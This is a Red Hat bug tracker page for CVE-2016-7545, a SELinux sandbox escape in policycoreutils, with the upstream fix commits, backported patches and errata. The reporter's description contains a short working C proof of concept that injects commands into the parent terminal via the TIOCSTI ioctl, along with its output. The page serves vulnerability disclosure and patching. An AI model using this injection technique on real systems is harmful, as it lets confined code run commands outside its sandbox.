Bug 1378577 (CVE-2016-7545) - CVE-2016-7545 policycoreutils: SELinux sandbox escape via TIOCSTI ioctl
Summary: CVE-2016-7545 policycoreutils: SELinux sandbox escape via TIOCSTI ioctl
Status: CLOSED ERRATA
Alias: CVE-2016-7545
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
high
high
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: impact=important,public=20160922,repo...
Keywords: Reopened, Security
Depends On: 1378932 1380733 1380734 1380735 1380736 1429954 1429955
Blocks: 1378931
TreeView+ depends on / blocked
 
Reported: 2016-09-22 19:04 UTC by Federico Manuel Bento
Modified: 2019-06-08 21:27 UTC (History)
15 users (show)

(edit)
It was found that the sandbox tool provided in policycoreutils was vulnerable to a TIOCSTI ioctl attack. A specially crafted program executed via the sandbox command could use this flaw to execute arbitrary commands in the context of the parent shell, escaping the sandbox.
Clone Of:
(edit)
Last Closed: 2017-03-15 14:17:34 UTC


Attachments (Terms of Use)
Basic SRPM patch against Rawhide (no changelog or rev bumps) (3.65 KB, patch)
2016-09-28 19:08 UTC, Paul Moore
no flags Details | Diff
Rawhide patch (policycoreutils-2.5-17.fc26.src.rpm) (4.28 KB, patch)
2016-09-28 19:18 UTC, Paul Moore
no flags Details | Diff
F25 patch (policycoreutils-2.5-17.fc25.src.rpm) (4.28 KB, patch)
2016-09-28 19:37 UTC, Paul Moore
no flags Details | Diff
F24 patch (policycoreutils-2.5-14.fc24.src.rpm) (4.18 KB, patch)
2016-09-28 19:57 UTC, Paul Moore
no flags Details | Diff
F23 patch (policycoreutils-2.4-22.fc23.src.rpm) (3.49 KB, patch)
2016-09-28 20:28 UTC, Paul Moore
no flags Details | Diff
RHEL-7.3 patch (policycoreutils-2.5-9.el7.src.rpm) (4.24 KB, patch)
2016-09-28 20:58 UTC, Paul Moore
no flags Details | Diff
RHEL-6.9 patch (policycoreutils-2.0.83-30.el6.src.rpm) (3.46 KB, patch)
2016-09-28 21:48 UTC, Paul Moore
no flags Details | Diff


External Trackers
Tracker ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2016:2702 normal SHIPPED_LIVE Important: policycoreutils security update 2016-11-14 17:21:00 UTC
Red Hat Product Errata RHSA-2017:0535 normal SHIPPED_LIVE Important: policycoreutils security update 2017-03-15 18:02:08 UTC
Red Hat Product Errata RHSA-2017:0536 normal SHIPPED_LIVE Important: policycoreutils security update 2017-03-15 18:01:58 UTC

Description Federico Manuel Bento 2016-09-22 19:04:04 UTC
Hi,

When executing a program via the SELinux sandbox, the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing an attacker to escape the sandbox.

$ cat test.c 
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}

$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000 context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
[saken@ghetto ~]$ id    <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023


This is similar to CVE-2016-2568, CVE-2016-2779, etc.

Thanks,
Federico Bento.

Comment 1 Paul Moore 2016-09-23 13:45:29 UTC
Upstream mailing list discussion:

 * https://marc.info/?t=147463464400001&r=1&w=2

Comment 2 Adam Mariš 2016-09-23 14:27:13 UTC
Created policycoreutils tracking bugs for this issue:

Affects: fedora-all [bug 1378932]

Comment 5 Federico Manuel Bento 2016-09-24 09:15:19 UTC
This was assigned CVE-2016-7545.

Comment 6 Andrej Nemec 2016-09-26 08:09:06 UTC
References:

http://seclists.org/oss-sec/2016/q3/606

Comment 8 Paul Moore 2016-09-28 18:30:26 UTC
(In reply to Paul Moore from comment #4)
> Upstream fixes:
> 
>  * https://marc.info/?l=selinux&m=147465156612756&w=2

To be clear, the patch above is not strictly necessary, but very helpful.

  commit 5b98f39de5119dcc865f6c7923682fb10219d45a
  Author: Petr Lautrbach <plautrba@redhat.com>
  Date:   Fri Sep 23 19:24:15 2016 +0200

    sandbox: do not try setup directories without -X or -M
    
    sandbox tried to copy all affected files to the new home
    or tmp even though -M or -X was not specified and there was no new
    directory.
    
    Fixes:
    $ sandbox ls ~
    /usr/bin/sandbox: [Errno 17] File exists: '/root'
    
    Signed-off-by: Petr Lautrbach <plautrba@redhat.com>

>  * https://marc.info/?l=selinux&m=147466045909969&w=2

This is the patch that fixes the vulnerability.

  commit acca96a135a4d2a028ba9b636886af99c0915379
  Author: Petr Lautrbach <plautrba@redhat.com>
  Date:   Fri Sep 23 19:24:16 2016 +0200

    sandbox: create a new session for sandboxed processes
    
    It helps to prevent sandboxed processes to inject arbitrary commands
    into the parent.
    
    Signed-off-by: Petr Lautrbach <plautrba@redhat.com>

Comment 10 Paul Moore 2016-09-28 19:08 UTC
Created attachment 1205640 [details]
Basic SRPM patch against Rawhide (no changelog or rev bumps)

Comment 11 Paul Moore 2016-09-28 19:18 UTC
Created attachment 1205641 [details]
Rawhide patch (policycoreutils-2.5-17.fc26.src.rpm)

Koji scratch-build:

 * http://koji.fedoraproject.org/koji/taskinfo?taskID=15848819

Comment 12 Paul Moore 2016-09-28 19:37 UTC
Created attachment 1205642 [details]
F25 patch (policycoreutils-2.5-17.fc25.src.rpm)

Koji scratch-build:

 * http://koji.fedoraproject.org/koji/taskinfo?taskID=15848928

Comment 13 Paul Moore 2016-09-28 19:57 UTC
Created attachment 1205646 [details]
F24 patch (policycoreutils-2.5-14.fc24.src.rpm)

Koji scratch-build:

 * http://koji.fedoraproject.org/koji/taskinfo?taskID=15849131

Comment 14 Paul Moore 2016-09-28 20:28 UTC
Created attachment 1205663 [details]
F23 patch (policycoreutils-2.4-22.fc23.src.rpm)

Koji scratch-build:

 * http://koji.fedoraproject.org/koji/taskinfo?taskID=15849416

Comment 15 Paul Moore 2016-09-28 20:58 UTC
Created attachment 1205679 [details]
RHEL-7.3 patch (policycoreutils-2.5-9.el7.src.rpm)

Comment 17 Paul Moore 2016-09-28 21:48 UTC
Created attachment 1205701 [details]
RHEL-6.9 patch (policycoreutils-2.0.83-30.el6.src.rpm)

Comment 19 Paul Moore 2016-09-28 21:54:51 UTC
NOTE: It looks like we did not backport the SELinux sandbox code to RHEL-5.x.

Comment 20 Paul Moore 2016-09-28 21:56:03 UTC
NOTE: While I've backported and done scratch builds for Rawhide, F25, F24, F23, RHEL-7.3, and RHEL-6.9, I haven't yet had a chance to verify these patches/builds.

Comment 28 errata-xmlrpc 2016-11-14 12:21:33 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7
  Red Hat Enterprise Linux 6

Via RHSA-2016:2702 https://rhn.redhat.com/errata/RHSA-2016-2702.html

Comment 32 errata-xmlrpc 2017-03-15 14:02:17 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7.1 Extended Update Support

Via RHSA-2017:0536 https://rhn.redhat.com/errata/RHSA-2017-0536.html

Comment 33 errata-xmlrpc 2017-03-15 14:02:39 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7.2 Extended Update Support

Via RHSA-2017:0535 https://rhn.redhat.com/errata/RHSA-2017-0535.html


Note You need to log in before you can comment on or make changes to this bug.